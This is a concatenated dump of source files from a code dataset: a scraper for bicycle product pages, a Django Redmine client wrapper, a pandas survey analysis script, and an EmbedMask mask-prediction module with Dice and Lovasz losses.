2610 Alanya Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2610-alanya.html'}, {'name': 'Kross Trans 5.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kross-trans-5-0.html'}, {'name': 'Kron ETX500 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-etx500.html'}, {'name': 'Salcano Attack 14 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-attack-14.html'}, {'name': 'Corelli Banner Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-banner.html'}, {'name': 'Corelli Voras 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-voras-1-0.html'}, {'name': 'Peugeot JM244 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-jm244.html'}, {'name': 'Corelli Smile 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-smile-20.html'}, {'name': 'Carraro Buffalo 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-buffalo-20.html'}, {'name': 'Carraro Elite 804 Bisiklet', 'link': 
'https://www.epey.com/bisiklet/carraro-elite-804.html'}, {'name': 'Ümit 1605 Little Pony Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-1605-little-pony.html'}, {'name': 'Ümit 2400 Colorado Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2400-colorado.html'}, {'name': 'Kron CX50 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-cx50-26-v.html'}, {'name': 'Corelli Beauty 2.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-beauty-2-1.html'}, {'name': 'Corelli Snoop 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-snoop-2-2.html'}, {'name': 'Corelli Evol 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-evol-2-0.html'}, {'name': 'Salcano Excel 24 Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-excel-24-lady.html'}, {'name': 'Corelli Apenin 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-apenin-1-0.html'}, {'name': 'Orbis Voltage 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-voltage-26.html'}, {'name': 'Mosso Groovy 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-groovy-29.html'}, {'name': 'Bianchi Aspid 36 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-aspid-36.html'}, {'name': 'Ümit 2864 Magnetic V Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2864-magnetic-v-lady.html'}, {'name': 'Cannondale F SI AL 3 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-f-si-al-3-27-5.html'}, {'name': 'Salcano Bodrum 26 Man Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-bodrum-26-man.html'}, {'name': 'Bianchi Energy D Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-energy-d-24.html'}, {'name': 'Ümit 2657 Albatros V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2657-albatros-v.html'}, {'name': 'Ümit 2012 Ben10 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2012-ben10.html'}, {'name': 'Ümit 2002 Z-Trend Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2002-z-trend.html'}, {'name': 'Mosso 29 WildFire LTD V Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-29-wildfire-ltd-v.html'}, {'name': 'Salcano 300 20 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-300-20-md.html'}, {'name': 'Salcano City Wind Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-wind-lady-hd.html'}, {'name': 'Salcano NG444 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng444-27-5-hd.html'}, {'name': 'Carraro Daytona 927 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-daytona-927.html'}, {'name': 'Kron FD2100 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-fd2100.html'}, {'name': 'Kron WRC1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-wrc1000.html'}, {'name': 'Vortex 5.0 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/vortex-5-0-27-5.html'}, {'name': 'Kron XC75L 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc75l-20.html'}, {'name': 'Kron Vortex 4.0 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-vortex-4-0-26-v.html'}, {'name': 'Kron Anthea 3.0 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-anthea-3-0-20.html'}, {'name': 'Peugeot T16-28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-t16-28.html'}, {'name': 'Peugeot M15-26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-m15-26.html'}, {'name': 'Daafu SXC 100 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/daafu-sxc-100-20.html'}, {'name': 'Corelli Kickboy 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-kickboy-20.html'}, {'name': 
'Peugeot F13 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-f13.html'}, {'name': 'Carraro Elite 805 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-elite-805.html'}, {'name': 'Carraro Force 920 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-force-920.html'}, {'name': 'Berg Jeep Adventure Bisiklet', 'link': 'https://www.epey.com/bisiklet/berg-jeep-adventure.html'}, {'name': 'Berg Buddy Orange Bisiklet', 'link': 'https://www.epey.com/bisiklet/berg-buddy-orange.html'}, {'name': 'Ümit 2019 Picolo Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2019-picolo.html'}, {'name': 'Ümit 2833 Ventura Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2833-ventura-lady.html'}, {'name': 'Ümit 2668 Faster V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2668-faster-v.html'}, {'name': 'Ümit 2960 Camaro HYD Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2960-camaro-hyd.html'}, {'name': 'Kron RF100 24 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-rf100-24-v.html'}, {'name': 'Sedona 240 Bisiklet', 'link': 'https://www.epey.com/bisiklet/sedona-240.html'}, {'name': 'Corelli Carmen 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-carmen-1-0.html'}, {'name': 'Corelli Swing 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-swing-2-0.html'}, {'name': 'Corelli Teton 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-teton-2-2.html'}, {'name': 'Bianchi Buffalo 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-buffalo-24.html'}, {'name': 'Carraro Juliana 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-juliana-26.html'}, {'name': 'Ghost Kato 5.7 AL Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-5-7-al.html'}, {'name': 'Bianchi Intenso Potenza Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-intenso-potenza.html'}, {'name': 'Salcano İmpetus 29 Deore Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-impetus-29-deore.html'}, {'name': 'Salcano NG400 27.5 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng400-27-5-lady-hd.html'}, {'name': 'Salcano NG750 26 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng750-26-lady-hd.html'}, {'name': 'Salcano NG800 24 Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng800-24-lady-v.html'}, {'name': 'Salcano Lion FS Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-lion-fs.html'}, {'name': 'Salcano City Fun 50 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-fun-50-lady-hd.html'}, {'name': 'Salcano Marmaris Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-marmaris.html'}, {'name': 'Salcano NG 800 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng-800-26-v.html'}, {'name': 'Corelli Terra 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-terra-1-0.html'}, {'name': 'Corelli Adonis 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-adonis-2-2.html'}, {'name': 'Corelli Jazz 1.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-jazz-1-2.html'}, {'name': 'Corelli Cyborg 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-cyborg-2-0.html'}, {'name': 'Corelli Scopri 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-scopri-2-0.html'}, {'name': 'Orbis Punkrose 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-punkrose-24.html'}, {'name': 'Orbis Tweety 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-tweety-16.html'}, {'name': 'Orbis Crazy 20 Bisiklet', 'link': 
'https://www.epey.com/bisiklet/orbis-crazy-20.html'}, {'name': 'Orbis Cloud 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-cloud-20.html'}, {'name': 'Orbis Dynamic 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-dynamic-24.html'}, {'name': 'Orbis Escape 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-escape-24.html'}, {'name': 'Tern Verge S27H Bisiklet', 'link': 'https://www.epey.com/bisiklet/tern-verge-s27h.html'}, {'name': 'Dahon Briza D8 Bisiklet', 'link': 'https://www.epey.com/bisiklet/dahon-briza-d8.html'}, {'name': 'Kron XC100 24 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc100-24-man-v.html'}, {'name': 'Kron TX150L Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-tx150-lady-v.html'}, {'name': 'Kron XC450 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc450-27-5-man-hd.html'}, {'name': 'Whistle Guipago 1830 Bisiklet', 'link': 'https://www.epey.com/bisiklet/whistle-guipago-1830.html'}, {'name': 'Mosso 20 WildFire V Boys Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-20-wildfire-v-boys.html'}, {'name': 'Mosso City Life Nexus Man Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-city-life-nexus-man.html'}, {'name': 'Mosso 771TB3 DMD Acera Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-771tb3-dmd-acera.html'}, {'name': 'Mosso 735TCA 105 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-735tca-105.html'}, {'name': 'Mosso Groovy 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-groovy-27-5.html'}, {'name': 'Ghost Kato 4 Kid 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-4-kid-24.html'}, {'name': 'Ghost Kato 2 Kid 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-2-kid-20.html'}, {'name': 'Ghost Lawu 2 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-lawu-2-26.html'}, {'name': 'Carraro Daytona 2924 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-daytona-2924.html'}, {'name': 'Carraro Flexi 103 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-flexi-103.html'}, {'name': 'Carraro Süngerbob 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-sungerbob-20.html'}, {'name': 'Bianchi Bella 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-bella-24.html'}, {'name': 'Bianchi RCX 237 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-rcx-237.html'}, {'name': 'Bianchi Touring 411 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-touring-411.html'}, {'name': 'Salcano Sarajevo 26 Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-sarajevo-26-lady.html'}, {'name': 'Salcano NG450 26 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng450-26-lady-hd.html'}, {'name': 'Salcano City Sport 40 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-sport-40-v.html'}, {'name': 'Ümit 2049 Monster High Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2049-monster-high.html'}, {'name': 'Cube Reaction GTC Race 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-reaction-gtc-race-27-5.html'}, {'name': 'Arbike 2901 Bisiklet', 'link': 'https://www.epey.com/bisiklet/arbike-2901.html'}, {'name': 'Arbike 2606 26 inç Bisiklet', 'link': 'https://www.epey.com/bisiklet/arbike-2606.html'}, {'name': 'Salcano NG350 29 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng350-hd-29.html'}, {'name': 'Salcano NG750 24 Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng750-lady-24.html'}, {'name': 'Cube Delhi Pro Bisiklet', 'link': 
'https://www.epey.com/bisiklet/cube-delhi-pro.html'}, {'name': 'Cube Attain Race Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-attain-race.html'}, {'name': 'Cube Attain GTC SL Disk Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-attain-gtc-sl-disk.html'}, {'name': 'Cube Acid 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-acid-27-5.html'}, {'name': 'Cube Agree C:62 SL Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-agree-c62-sl.html'}, {'name': 'Merida BIG.NINE XT Edition 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/merida-big-nine-xt-edition-29.html'}, {'name': 'Merida BIG.SEVEN 1000 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/merida-big-seven-1000-27-5.html'}, {'name': 'Trek Superfly 5 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/trek-superfly-5-29.html'}, {'name': 'Geotech Manic Carbon 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/geotech-manic-carbon-29.html'}, {'name': 'Corratec Superbow Fun 29ER 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corratec-superbow-fun-29er-29.html'}, {'name': 'Corratec Dolomiti Sora 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corratec-dolomiti-sora-28.html'}, {'name': 'Cannondale Supersix Evo Ultegra Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-supersix-evo-ultegra-4-28.html'}, {'name': 'Cannondale Bad Boy 4 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-bad-boy-4-28.html'}, {'name': 'Cannondale Trail Womens 5 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-trail-womens-5-27-5.html'}, {'name': 'Schwinn Searcher 3 Men 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/schwinn-searcher-3-men-28.html'}, {'name': 'Geotech Path XC 4.4 20. Yil özel Seri 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/geotech-path-xc-4-4-20-yil-ozel-seri-26.html'}, {'name': 'Kron XC250 Lady 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc250-lady-26.html'}, {'name': 'Kron TX150 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-tx150-hd.html'}, {'name': 'Salcano Igman 27.5 Deore Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-igman-deore-27-5.html'}, {'name': 'Salcano Astro 29 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-astro-v-29.html'}, {'name': 'Salcano City Wings 20 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-wings-20-hd.html'}, {'name': 'Salcano XRS050 Claris Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-xrs050-claris.html'}, {'name': 'Salcano Tracker 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-tracker-20.html'}, {'name': 'Salcano Cappadocia Steel Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-cappadocia-steel.html'}, {'name': 'Salcano Assos 20 29 X1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-assos-20-x1-29.html'}, {'name': 'Salcano Assos 10 29 X1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-assos-10-x1-29.html'}, {'name': 'Scott Contessa 640 Bisiklet', 'link': 'https://www.epey.com/bisiklet/scott-contessa-640-26.html'}, {'name': 'Tern Link B7 Bisiklet', 'link': 'https://www.epey.com/bisiklet/tern-link-b7-20.html'}, {'name': 'Bianchi Honey Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-honey-16.html'}, {'name': 'Bianchi Touring 405 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-touring-405-bayan-28.html'}, {'name': 'Bianchi AFX 7029 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-afx-7029-29.html'}, {'name': 'Bianchi RCX 426 Bisiklet', 'link': 
'https://www.epey.com/bisiklet/bianchi-rcx-426-26.html'}, {'name': 'Bianchi Nitro Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-nitro-24.html'}, {'name': 'Carraro Sportive 327 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-sportive-327-28.html'}, {'name': 'Carraro Street 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-street-26.html'}, {'name': 'Carraro Big 629 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-big-629-29.html'}, {'name': 'Carraro Crs 620 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-crs-620-26.html'}, {'name': 'Sedona Black Code 8 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/sedona-black-code-8-27-5.html'}, {'name': 'Coranna 2491 Castor Bisiklet', 'link': 'https://www.epey.com/bisiklet/coranna-2491-castor.html'}, {'name': "Ümit 2842 City's Bisiklet", 'link': 'https://www.epey.com/bisiklet/umit-2842-citys-2842-citys.html'}, {'name': 'Ümit 2411 Rideon Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2411-rideon.html'}, {'name': 'Ümit 2056 Accrue 2D 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2056-accrue-2d-20.html'}, {'name': 'Ümit 1671 Superbomber 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-1671-superbomber-16.html'}, {'name': 'Ümit 2802 Taurus Man 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2802-taurus-man-28.html'}, {'name': 'Ümit 2053 Thunder 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2053-thunder-20.html'}, {'name': 'Ümit 2965 Mirage V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2965-mirage-v.html'}, {'name': 'Gitane Fast Bisiklet', 'link': 'https://www.epey.com/bisiklet/gitane-fast.html'}, {'name': 'Carraro Kifuka 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-kifuka-27-5.html'}] for i in bicycles: url = i['link'] try: req = Request(url, headers={'User-Agent': 'Mozilla/5.0'}) webpage = urlopen(req).read() except: print("err in "+i['link']) else: print("Downloaded "+i['name']+" ", end="\r") fileName = i['name'].replace('/','_') f = open("./listItems/"+fileName+'.html', 'wb') f.write(webpage) f.close
[((12, 14, 12, 65), 'urllib.request.Request', 'Request', (), '', False, 'from urllib.request import Request, urlopen\n'), ((13, 18, 13, 30), 'urllib.request.urlopen', 'urlopen', ({(13, 26, 13, 29): 'req'}, {}), '(req)', False, 'from urllib.request import Request, urlopen\n')]
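A hedged rewrite of the download loop at the end of downLink5.py above: the original calls f.close without parentheses (so the handle is never explicitly closed) and catches every exception. The sketch below is not part of the repository; it assumes the bicycles list and the ./listItems/ directory exist.

from urllib.error import URLError
from urllib.request import Request, urlopen

for item in bicycles:  # 'bicycles' as defined in the script above
    try:
        req = Request(item['link'], headers={'User-Agent': 'Mozilla/5.0'})
        webpage = urlopen(req).read()
    except URLError:
        print("err in " + item['link'])
        continue
    file_name = item['name'].replace('/', '_')
    # the context manager closes the file even if the write fails
    with open("./listItems/" + file_name + '.html', 'wb') as f:
        f.write(webpage)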
hugoseabra/redmine-task-generator
redmine/__init__.py
b5ce1764f1c7588a7c82b25f7dd4bf07d1c105cf
from django.conf import settings from redminelib import Redmine as DefaultRedmine from .validator import RedmineInstanceValidator class Redmine(DefaultRedmine): def __init__(self, url=None, key=None): url = url or settings.REDMINE_BASE_URL key = key or settings.REDMINE_API_KEY super().__init__(url=url, key=key) self.validator = RedmineInstanceValidator(client=self) @property def score_field(self): return self.validator.score_field def instance_errors(self): errors = list() if self.validator.track_errors: errors += self.validator.track_errors if self.validator.score_field_errors: errors += self.validator.score_field_errors return errors def instance_valid(self) -> bool: return self.validator.instance_valid() def project_valid(self, project_id) -> bool: return self.validator.project_valid(project_id)
[]
trenton3983/PyCharmProjects
python_survey/finished_files/main.py
fae8653a25e07e7384eb0ddf6ea191adeb44face
import pandas as pd import numpy as np import matplotlib.pyplot as plt import scipy.stats from finished_files.survey_data_dictionary import DATA_DICTIONARY # Load data # We want to take the names list from our data dictionary names = [x.name for x in DATA_DICTIONARY] # Generate the list of names to import usecols = [x.name for x in DATA_DICTIONARY if x.usecol] # dtypes should be a dict of 'col_name' : dtype dtypes = {x.name : x.dtype for x in DATA_DICTIONARY if x.dtype} # same for converters converters = {x.name : x.converter for x in DATA_DICTIONARY if x.converter} df = pd.read_csv('data/survey.csv', header=0, names=names, dtype=dtypes, converters=converters, usecols=usecols) #%% Clean up data: remove disqualified users # In the survey, any user who selected they don't use Python was then # disqualified from the rest of the survey. So let's drop them here. df = df[df['python_main'] != 'No, I don’t use Python for my current projects'] # Considering we now only have two categories left: # - Yes # - No, I use Python for secondary projects only # Let's turn it into a bool df['python_main'] = df['python_main'] == 'Yes' #%% Plot the web dev / data scientist ratio # In the survey, respondents were asked to estimate the ratio between # the amount of web developers vs the amount of data scientists. Afterwards # they were asked what they thought the most popular answer would be. # Let's see if there's a difference! # This is a categorical data point, and it's already ordered in the data # dictionary. So we shouldn't sort it after counting the values. ratio_self = df['webdev_science_ratio_self'].value_counts(sort=False) ratio_others = df['webdev_science_ratio_others'].value_counts(sort=False) # Let's draw a bar chart comparing the distributions fig = plt.figure() ax = fig.add_subplot(111) RATIO_COUNT = ratio_self.count() x = np.arange(RATIO_COUNT) WIDTH = 0.4 self_bars = ax.bar(x-WIDTH, ratio_self, width=WIDTH, color='b', align='center') others_bars = ax.bar(x, ratio_others, width=WIDTH, color='g', align='center') ax.set_xlabel('Ratios') ax.set_ylabel('Observations') labels = [str(lbl) for lbl in ratio_self.index] ax.set_xticks(x - 0.5 * WIDTH) ax.set_xticklabels(labels) ax.legend((self_bars[0], others_bars[0]), ('Self', 'Most popular')) plt.show() #%% Calculate the predicted totals # Let's recode the ratios to numbers, and calculate the means CONVERSION = { '10:1': 10, '5:1' : 5, '2:1' : 2, '1:1' : 1, '1:2' : 0.5, '1:5' : 0.2, '1:10': 0.1 } self_numeric = df['webdev_science_ratio_self'] \ .replace(CONVERSION.keys(), CONVERSION.values()) others_numeric = df['webdev_science_ratio_others'] \ .replace(CONVERSION.keys(), CONVERSION.values()) print(f'Self:\t\t{self_numeric.mean().round(2)} web devs / scientist') print(f'Others:\t\t{others_numeric.mean().round(2)} web devs / scientist') #%% Is the difference statistically significant? result = scipy.stats.chisquare(ratio_self, ratio_others) # The null hypothesis is that they're the same. Let's see if we can reject it print(result)
[((22, 5, 27, 33), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((55, 6, 55, 18), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((59, 4, 59, 26), 'numpy.arange', 'np.arange', ({(59, 14, 59, 25): 'RATIO_COUNT'}, {}), '(RATIO_COUNT)', True, 'import numpy as np\n'), ((73, 0, 73, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n')]
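As a quick illustration of the recoding step in main.py above (the categorical web-dev/data-scientist ratios are mapped to numbers before averaging), a minimal pandas sketch with made-up values rather than the survey data:

import pandas as pd

conversion = {'10:1': 10, '5:1': 5, '2:1': 2, '1:1': 1, '1:2': 0.5, '1:5': 0.2, '1:10': 0.1}
ratios = pd.Series(['2:1', '1:1', '5:1', '1:2'])  # toy responses
numeric = ratios.map(conversion)                  # same effect as the replace(...) call above
print(numeric.mean())                             # 2.125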
yinghdb/AdelaiDet
adet/modeling/embedmask/mask_pred.py
94a9b7cde92fb039852f876964d991a1f3e15af4
import torch from torch.nn import functional as F from torch import nn from torch.autograd import Variable from adet.utils.comm import compute_locations, aligned_bilinear def dice_coefficient(x, target): eps = 1e-5 n_inst = x.size(0) x = x.reshape(n_inst, -1) target = target.reshape(n_inst, -1) intersection = (x * target).sum(dim=1) union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps loss = 1. - (2 * intersection / union) return loss def lovasz_grad(gt_sorted): """ Computes gradient of the Lovasz extension w.r.t sorted errors See Alg. 1 in paper """ p = len(gt_sorted) gts = gt_sorted.sum() intersection = gts - gt_sorted.float().cumsum(0) union = gts + (1 - gt_sorted.float()).cumsum(0) jaccard = 1. - intersection / union if p > 1: # cover 1-pixel case jaccard[1:p] = jaccard[1:p] - jaccard[0:-1] return jaccard def lovasz_hinge(logits, labels): """ Binary Lovasz hinge loss logits: [P] Variable, logits at each prediction (between -\infty and +\infty) labels: [P] Tensor, binary ground truth labels (0 or 1) """ if len(labels) == 0: # only void pixels, the gradients should be 0 return logits.sum() * 0. signs = 2. * labels.float() - 1. errors = (1. - logits * Variable(signs)) errors_sorted, perm = torch.sort(errors, dim=0, descending=True) perm = perm.data gt_sorted = labels[perm] grad = lovasz_grad(gt_sorted) loss = torch.dot(F.relu(errors_sorted), Variable(grad)) return loss def lovasz_loss(x, target): eps = 1e-6 n_inst = x.size(0) x = x.reshape(n_inst, -1) target = target.reshape(n_inst, -1) x = torch.clamp(x, min=eps, max=1-eps) x = torch.log(x) - torch.log(1 - x) losses = [] for i in range(n_inst): losses.append(lovasz_hinge(x[i], target[i])) loss = torch.stack(losses) return loss def build_mask_pred(cfg): return MaskPred(cfg) class MaskPred(nn.Module): def __init__(self, cfg): super(MaskPred, self).__init__() self.in_channels = cfg.MODEL.EMBEDMASK.MASK_BRANCH.OUT_CHANNELS self.mask_out_stride = cfg.MODEL.EMBEDMASK.MASK_OUT_STRIDE soi = cfg.MODEL.FCOS.SIZES_OF_INTEREST self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2])) self.register_buffer("_iter", torch.zeros([1])) self.mask_loss_type = cfg.MODEL.EMBEDMASK.MASK_LOSS_TYPE self.mask_loss_alpha = cfg.MODEL.EMBEDMASK.MASK_LOSS_ALPHA def __call__(self, pixel_embed, mask_feat_stride, pred_instances, gt_instances=None): if self.training: self._iter += 1 gt_inds = pred_instances.gt_inds gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances]) gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=pixel_embed.dtype) losses = {} if len(pred_instances) == 0: dummy_loss = pixel_embed.sum() * 0 + pred_instances.proposal_embed.sum() * 0 + pred_instances.proposal_margin.sum() * 0 losses["loss_mask"] = dummy_loss else: mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride) if self.mask_loss_type == "Dice": mask_losses = dice_coefficient(mask_prob, gt_bitmasks) loss_mask = mask_losses.mean() elif self.mask_loss_type == "Lovasz": mask_losses = lovasz_loss(mask_prob, gt_bitmasks) loss_mask = mask_losses.mean() losses["loss_mask"] = loss_mask * self.mask_loss_alpha return losses else: if len(pred_instances) > 0: mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride) pred_instances.pred_global_masks = mask_prob return pred_instances def compute_mask_prob(self, instances, pixel_embed, mask_feat_stride): proposal_embed = instances.proposal_embed proposal_margin = instances.proposal_margin im_inds = instances.im_inds dim, m_h, m_w = 
pixel_embed.shape[-3:] obj_num = proposal_embed.shape[0] pixel_embed = pixel_embed.permute(0, 2, 3, 1)[im_inds] proposal_embed = proposal_embed.view(obj_num, 1, 1, -1).expand(-1, m_h, m_w, -1) proposal_margin = proposal_margin.view(obj_num, 1, 1, dim).expand(-1, m_h, m_w, -1) mask_var = (pixel_embed - proposal_embed) ** 2 mask_prob = torch.exp(-torch.sum(mask_var * proposal_margin, dim=3)) assert mask_feat_stride >= self.mask_out_stride assert mask_feat_stride % self.mask_out_stride == 0 mask_prob = aligned_bilinear(mask_prob.unsqueeze(1), int(mask_feat_stride / self.mask_out_stride)) return mask_prob
